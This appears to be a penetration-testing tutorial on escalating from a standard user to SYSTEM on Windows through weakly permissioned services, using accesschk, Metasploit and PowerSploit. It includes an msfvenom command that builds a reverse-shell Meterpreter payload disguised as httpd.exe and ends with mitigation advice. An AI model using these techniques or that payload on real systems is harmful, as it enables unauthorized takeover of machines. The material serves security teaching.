It is very often in Windows environments to discover services that run with SYSTEM privileges and they don’t have the appropriate permissions set by the administrator. This means that either the user has permissions over the service or over the folder of where the binary of the service is stored or even worse both. These services can be found mostly in third party software and can be used as an escalation point from user to administrator.

Manual

The first thing once a meterpreter sessions has been established as a standard user is to determine if there are any services that the user has excessive privileges on them. This can be done with the use of accesschk tool from SysInternals.

Meterpreter - Uploading Accesschk

Uploading Accesshk tool on the target

The command below will list all the services that the user “pentestlab” can modify.

Determination of Permissions over a Service

Determination of Permissions over a Service

Service All Access means that the user has full control over this service and therefore it is possible the properties of this service to be modified. The next step is to determine the status of this service, the binary path name and if the service with higher privileges.

Obtaining the Service Configuration

Obtaining the Service Configuration

Since the Apache service is running as Local System this means that the BINARY_PATH_NAME parameter can be modified to execute any command on the system. The path of the service binary will be changed in order to add the “pentestlab” user to the local administrators group the next time that the service will restart and therefore to escalate our privileges via this method.

Changing the Service Configuration

Changing the Service Configuration

Restarting the service will cause the Apache service to fail as the binary path would not point into the actual executable of the service.

Restarting the Service

Restarting the Service

However the command will be executed successfully and the user “pentestlab” will be added to the local administrators group.

Escalation of Privileges via Weak Permissions

Escalation of Privileges via Weak Service Permissions

Metasploit

There is metasploit module which can exploit weak service permissions very easily. This module needs to be linked into an existing session.

Metasploit - Service Permission Module

Metasploit – Service Permission Module

This module will try to identify services that the user has write access on the binary path and if this succeeds, will write a payload in a temporary folder, reconfigure the binary path of the service to point into the payload and not in the original executable and finally will attempt to restart the service in order for the payload to be executed as SYSTEM.

Metasploit - Privilege Escalation via Service Permission

Metasploit Privilege Escalation via Service Permission

PowerSploit

Exploitation of weak service permissions can be done as well completely through PowerSploit as it contains modules for service enumeration and service abuse. Depending on the situation and on the privileges available there are two scenarios for privilege escalation:

  1. Binary Path
  2. Replacing the Service Binary

Binary Path

The Get-ServiceDetail module will list some basic information about the service like the process ID and the state.

PowerSploit - Service Details

PowerSploit – Service Details

The module that will display information equivalent to the query service configuration is the Get-ModifiableService . This module will list all the services that the user can modify the binary path and also will determine if the user can restart the service.

PowerSploit - List Modifiable Services

PowerSploit – List Services which the binary path can be modified

The module Invoke-ServiceAbuse will automatically modify the binary path and restart the service in order to add the user john into the local administrators group.

PowerSploit - Abusing the Binary Path

PowerSploit – Abusing the Binary Path

The verification that the administrator account has been created can be done just by using the net localgroup administrators command.

PowerSploit - Backdoor Admnistrator Account

PowerSploit – Backdoor Administrator Account

Replacing the Service Binary

If the user has permissions to write a file into the folder of where the binary of the service is located then it is possible to just replace the binary with the a custom payload and then restart the service in order to escalate privileges.

The full list of permissions for the services running on the system can be obtained through the module Get-ModifiableServiceFile.

PowerSploit - Obtain Services and File Permissions

PowerSploit – Obtain Services and File Permissions

From the image above the following conditions exist:

  • Apache Service is running as Local System
  • Standard users have permissions to modify the file of where the binary is stored

This means that the httpd.exe can be replaced by normal users. PowerSploit can also create a custom binary that will add a user as local administrator.

PowerSploit Creating the Custom Service

PowerSploit – Creating the Custom Service

It should be noted that the service.exe needs to be renamed to httpd.exe ,which is the original binary that the service will execute, and dropped into the binary path. Once the service is restarted the command will be executed and a new user will be created on the system with local administrator rights.

Custom Service Planted into Binary Path

Custom Service Planted into Binary Path

 

Restart of the Service

Restart of the Service

PowerSploit - Execution of Service Payload

PowerSploit – Execution of Service Payload

Alternatively it also possible to generate a custom payload through Metasploit and configure a listener in order to get a proper Meterpreter session.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3
LPORT=4444 -f exe -o /root/Desktop/httpd.exe

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes

Saved as: /root/Desktop/httpd.exe
Metasploit - System via Service Binary Replacement

Metasploit – System via Service Binary Replacement

Conclusion

Privilege escalation via weak service permissions is something that can be exploited relatively easy and with various tools and methods. Therefore evaluation of permissions for the services  and folders that exists on the system is necessary to mitigate this threat. In a summary:

  • Users should not have permissions to start or stop a service
  • The folder of which the service binary is located should be accessible only to Administrators

 

Advertisements